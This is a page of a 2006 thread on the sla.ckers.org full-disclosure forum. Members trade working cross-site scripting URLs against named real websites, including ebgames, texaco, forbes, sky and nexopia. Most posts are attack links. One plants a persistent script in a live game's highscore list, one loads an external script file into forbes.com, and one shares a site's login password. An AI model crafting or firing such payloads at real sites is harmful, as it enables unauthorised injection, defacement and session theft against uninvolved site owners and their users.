Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2021222324252627282930...LastNext
Current Page: 25 of 65
Re: So it begins
Posted by: unsticky
Date: November 07, 2006 08:43AM

maluc Wrote:
-------------------------------------------------------
> well the first (maybe not only) problem is that
> their already is an onload event.
>
> You can't inject and overwrite any existing
> onload events sadly :/
>
> -maluc

Sorry it took so long for me to actually respond, but I saw what you guys were saying, and instead of using a body tag with an onLoad event, why not use an image tag with an onError even with source set to something like a? I tried it out and got it to work, using <img src="a" onError="alert('xss')">, modifiying the post data you supplied.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: November 07, 2006 09:44AM

ya, i didnt try any other vectors on his site, but yes onerror is another convenient vector. and usually i try image tags third in line after script tags being filtered (iframe second)

by the way, you made the 1000th post of the Full Disclosure forum ^^

-maluc



Edited 1 time(s). Last edit at 11/07/2006 09:45AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 07, 2006 10:28AM

Whoah! Really? 1000? I should really pay more attention to that kind of stuff. Congrats to all, I think this is probably one of the most important security forums ever made because of all the work you guys put into it. You guys are really raising eyebrows right now, and it's all for a good educational cause!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 07, 2006 11:32AM

Attack of the XSS: http://bunnyherolabs.com/dhtml/monster.php?ref=javascript:alert%28%22XSS%22%29%3B

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 11/07/2006 11:38AM by rsnake.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: November 07, 2006 12:44PM

http://www.ebgames.com/search.asp?Ntk=TitleKeyword&Ntx=mode%2Bmatchallpartial&Ntt=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&N=0&find.x=0&find.y=0

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: November 07, 2006 01:52PM

there's also 199 members now.. which lurker'll be lucky 200?

i agree, this forum has expanded quite fast - 200 non-lurkers in the first 11 weeks is no small feat. but most of all, the quality of conversations/posts here seem far better than what you find in other unnamed forums. so keep up the good work everybody ^^

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: November 07, 2006 02:37PM

Yeah most other forums would have degenerated into discussions about grandma porn by now.

-id

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 07, 2006 03:46PM

Aside from a few obviously spam users, (making it slightly less than 199 users in reality) and a few unconfirmed users it's a pretty clean list. Most people are just lurking of course, and there are only a few of us who are over the 50 post mark (some of us are way way way over that but here's the list):

digi7al64 65
Ghozt 60
id 174
kirke 58
Kyran 229
maluc 420
rsnake 776
WhiteAcid 190


And a few of the upcoming stars:

Ambush Commander 40
Girzi 44
jungsonn 46
lpilorz 25
pheusion 26
trix 43
unsticky 25

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: November 07, 2006 05:51PM

wow, i post here too much.. (and yet rsnake still has 85% more posts ^^)

i learn a lot though, so probably worth the time spent :x

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: November 07, 2006 06:30PM

Heh, I thought I had less than that. I don't really think of those sort of things. My e-penis/ego is of adequate size.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 07, 2006 10:21PM

http://search.wn.com/?version=1&template=oil%2Findex.txt&search_string=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&language_id=-1&template=worldnews%2Findex.txt&action=search&first=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 07, 2006 10:23PM

http://www.texaco.com/?selectcountry=%22;alert(%22XSS%22);//

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 07, 2006 10:38PM

Chevron's SEC filings (why would you let consumers change the color of the background on the page anyway)?

http://ccbn.tenkwizard.com/filing.php?repo=tenk&ipage=3519814&doc=1&total=&attach=ON&TK=CVX&CK=0000093410&CN=ChevronTexaco+Corp.&FG=0&CK2=93410&FC=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&BK=FFFFFF&SC=ON&TC1=FFFFFF&TC2=FFFFFF

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: November 08, 2006 01:16AM

RSnake obviously doesn't understand how e-important it is to be an e-investor in an e-oil company.

-id

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: November 08, 2006 01:19AM

e-xactly.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: November 08, 2006 05:04AM

http://search.sky.com/search/skynews/results?QUERY=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx&CID=30000&Submit.x=0&Submit.y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: jungsonn
Date: November 08, 2006 06:12AM

Myeah, i'm getting there.
http://www.mtv.nl/homepage/artikel.php?article=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22

Options: ReplyQuote
Re: So it begins
Posted by: jungsonn
Date: November 08, 2006 09:59AM

Some new tales from the Scripts:

http://www.cduniverse.com/sresult.asp?HT_Search_Info=%22%3E%3Cscript%3Ealert%28%27Tales+from+the+scripts...+XSS+rated%21%21%27%29%3B%3C%2Fscript%3E&HT_Search=TITLE&image.x=0&image.y=0&cart=423465202&style=ice&altsearch=yes

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: November 08, 2006 02:32PM

Persistent XSS + scorelist hack.

!!!!DO NOT CLICK ON THIS LINK UNLESS YOU WANT TO INSERT A PERSISTENT XSS!!!!

http://ludimate.com/products/tilelander/highscores/addscore.php?code=B8CWTAG4U4&name=<script>alert('Sla..ckers.org')</script>&location=Everywhere&country=US

It is only good for one post (I think). The following is the one time code: B8C WTA G4U4

The top score list is at http://ludimate.com/products/tilelander/highscores/index.php

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 08, 2006 04:51PM

hmm... didn't work for me but this one (non persistant) did: http://ludimate.com/products/tilelander/highscores/addscore.php?code=B8CWTAG4U4&name=%22%3E%3Cscript%3Ealert('Sla..ckers.org')%3C/script%3E&location=Everywhere&country=US

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: jungsonn
Date: November 08, 2006 06:39PM

Oh yeah the last link of me had some nice "hacker safe" logo sticking on the site, 24/7 meh. Ghehe... get a life.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: November 08, 2006 08:07PM

http://search.forbes.com/search/find?action=advancedSearch&start=1&max=20&sort=Relevance&MT=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3Cscript%3E&pub=forbes.com%2Cmagazine%2Cfyi%2Cbest&author=&tickers=&pubDateStart=mm%2Fdd%2Fyyyy&pubDateEnd=mm%2Fdd%2Fyyyy&contentType=all&storyType=all&premium=on

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 08, 2006 11:55PM

Did you know that XSS is in the dictionary? http://dictionary.reference.com/browse/';alert('XSS%20n.%20to%20haX0r')//

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 08, 2006 11:58PM

XSS is finally on the map! http://www.randmcnally.com/rmc/search/srcStoreSearch.jsp?BV_SessionID=%40%40%40%401173383824.1163051748%40%40%40%40&BV_EngineID=ccceaddjfmfhlegcefecggfdffhdghh.0&txtSearch=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: November 09, 2006 12:06AM

I heard there's a discount on XSS today: http://www.ecoupons.com/users.php?username=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&email=&confirmemail=&fullname=&address1=&address2=&state=--&zipcode=&country=--&year=&sex=--&income=--&mode=create

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: November 09, 2006 01:29AM

http://reg.imageshack.us/content.php?page=email&q=%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: November 09, 2006 02:03AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.nexopia.com/profile.php&requestType=query&requestParams[ageRangeMin]='/%3E%3Cscript%3Ealert('xss');%3C/script%3Exss << Nexopia via POST. wwwdot2 - password > if you need to be logged in.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: jungsonn
Date: November 09, 2006 02:18AM

Why waste your time...
http://www.stopwaste.org/lib/search.asp?index=F%3A%5Cwebsites%5CAlameda%5Csearch&stemming=&maxFiles=25&autoStopLimit=5000&sort=Hits&cmd=search&SearchForm=%25%25SearchForm%25%25&request=%22%3E%3Cscript%3Ealert%28%27Why+Oh+oh+why....+wasting%20your%20time%20on%20this%3F%27%29%3B%3C%2Fscript%3E%3C%22

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: November 09, 2006 02:25AM

http://www.nexopia.com/header.php?bodyname='%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cx

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: November 09, 2006 02:30AM

Nice one.

- Kyran

Options: ReplyQuote
Pages: PreviousFirst...2021222324252627282930...LastNext
Current Page: 25 of 65


Go to: Forum ListMessage ListSearchLog In
Sorry, only registered users may post in this forum.
Click here to login

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *